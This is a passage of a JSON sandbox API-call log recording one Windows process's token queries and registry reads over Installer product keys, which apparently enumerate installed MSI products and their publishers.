"thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 91 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\6F44AD6D2BD8E734883088D7D16A3610" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\6F44AD6D2BD8E734883088D7D16A3610" } ], "repeated": 0, "id": 92 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 93 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 94 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x94\\xe7\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xf4\\xe7\\x19\\x00\\x00\\x00\\x00\\x00\\xfb\\xe7\\x19\\x00\"\r\\x08s\\x18\\xe8\\x19\\x00\\x0c\\xe8\\x19\\x00H\\x00\\x00\\x00<\\xe8\\x19\\x00\\x04\\xeb\\x19\\x00" } ], "repeated": 0, "id": 95 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 96 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\6F44AD6D2BD8E734883088D7D16A3610\\InstallProperties" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\6F44AD6D2BD8E734883088D7D16A3610\\InstallProperties" } ], "repeated": 0, "id": 97 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegQueryValueExA", "status": false, "return": "0x000000ea", "arguments": [ { "name": "Handle", "value": "0x00000238" }, { "name": "ValueName", "value": "Publisher" }, { "name": "Type", "value": "0x00000001", "pretty_value": "REG_SZ" }, { "name": "DataLength", "value": "27" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\6F44AD6D2BD8E734883088D7D16A3610\\InstallProperties\\Publisher" } ], "repeated": 0, "id": 98 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 99 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 100 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x80\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xe0\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\xe7\\xf3\\x19\\x00\"\r\\x08s\\x04\\xf4\\x19\\x00\\xf8\\xf3\\x19\\x00H\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xcf\\xb6Pv" } ], "repeated": 0, "id": 101 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 102 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" } ], "repeated": 0, "id": 103 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegEnumKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" }, { "name": "Index", "value": "3" }, { "name": "Name", "value": "7A843FC81A86453429FD1FC7B2B3EF24" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Installer\\Products\\7A843FC81A86453429FD1FC7B2B3EF24" } ], "repeated": 0, "id": 104 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x0000023c" } ], "repeated": 0, "id": 105 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x80\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xe0\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\xe7\\xf3\\x19\\x00\"\r\\x08s\\x04\\xf4\\x19\\x00\\xf8\\xf3\\x19\\x00H\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 106 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000023c" } ], "repeated": 0, "id": 107 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" } ], "repeated": 0, "id": 108 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 109 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 110 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "`\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xc0\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\xc7\\xe1\\x19\\x00\"\r\\x08s\\xe4\\xe1\\x19\\x00\\xd8\\xe1\\x19\\x00H\\x00\\x00\\x00\\x00\\x003\\x02\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 111 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 112 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\7A843FC81A86453429FD1FC7B2B3EF24" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\7A843FC81A86453429FD1FC7B2B3EF24" } ], "repeated": 0, "id": 113 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 114 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "`\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xc0\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\xc7\\xe1\\x19\\x00\"\r\\x08s\\xe4\\xe1\\x19\\x00\\xd8\\xe1\\x19\\x00H\\x00\\x00\\x00\\xec\\xea\\x19\\x00\\xcc\\xbeUs" } ], "repeated": 0, "id": 115 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 116 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\7A843FC81A86453429FD1FC7B2B3EF24" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\7A843FC81A86453429FD1FC7B2B3EF24" } ], "repeated": 0, "id": 117 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 118 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 119 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x94\\xe7\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xf4\\xe7\\x19\\x00\\x00\\x00\\x00\\x00\\xfb\\xe7\\x19\\x00\"\r\\x08s\\x18\\xe8\\x19\\x00\\x0c\\xe8\\x19\\x00H\\x00\\x00\\x00<\\xe8\\x19\\x00\\x04\\xeb\\x19\\x00" } ], "repeated": 0, "id": 120 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 121 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\7A843FC81A86453429FD1FC7B2B3EF24\\InstallProperties" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\7A843FC81A86453429FD1FC7B2B3EF24\\InstallProperties" } ], "repeated": 0, "id": 122 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegQueryValueExA", "status": false, "return": "0x000000ea", "arguments": [ { "name": "Handle", "value": "0x00000238" }, { "name": "ValueName", "value": "Publisher" }, { "name": "Type", "value": "0x00000001", "pretty_value": "REG_SZ" }, { "name": "DataLength", "value": "27" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\7A843FC81A86453429FD1FC7B2B3EF24\\InstallProperties\\Publisher" } ], "repeated": 0, "id": 123 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 124 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 125 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x80\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xe0\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\xe7\\xf3\\x19\\x00\"\r\\x08s\\x04\\xf4\\x19\\x00\\xf8\\xf3\\x19\\x00H\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xcf\\xb6Pv" } ], "repeated": 0, "id": 126 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 127 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" } ], "repeated": 0, "id": 128 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegEnumKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" }, { "name": "Index", "value": "4" }, { "name": "Name", "value": "C2852A6403C47FF4FA550FF1E6CF2D6B" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Installer\\Products\\C2852A6403C47FF4FA550FF1E6CF2D6B" } ], "repeated": 0, "id": 129 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x0000023c" } ], "repeated": 0, "id": 130 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x80\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xe0\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\xe7\\xf3\\x19\\x00\"\r\\x08s\\x04\\xf4\\x19\\x00\\xf8\\xf3\\x19\\x00H\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 131 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000023c" } ], "repeated": 0, "id": 132 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" } ], "repeated": 0, "id": 133 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 134 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 135 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "`\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xc0\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\xc7\\xe1\\x19\\x00\"\r\\x08s\\xe4\\xe1\\x19\\x00\\xd8\\xe1\\x19\\x00H\\x00\\x00\\x00\\x0cq\\x19w\\x00\\x10\\x00\\x00" } ], "repeated": 0, "id": 136 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 137 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\C2852A6403C47FF4FA550FF1E6CF2D6B" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\C2852A6403C47FF4FA550FF1E6CF2D6B" } ], "repeated": 0, "id": 138 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 139 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "`\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xc0\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\xc7\\xe1\\x19\\x00\"\r\\x08s\\xe4\\xe1\\x19\\x00\\xd8\\xe1\\x19\\x00H\\x00\\x00\\x00\\xec\\xea\\x19\\x00\\xcc\\xbeUs" } ], "repeated": 0, "id": 140 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 141 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\C2852A6403C47FF4FA550FF1E6CF2D6B" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\C2852A6403C47FF4FA550FF1E6CF2D6B" } ], "repeated": 0, "id": 142 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 143 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 144 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": 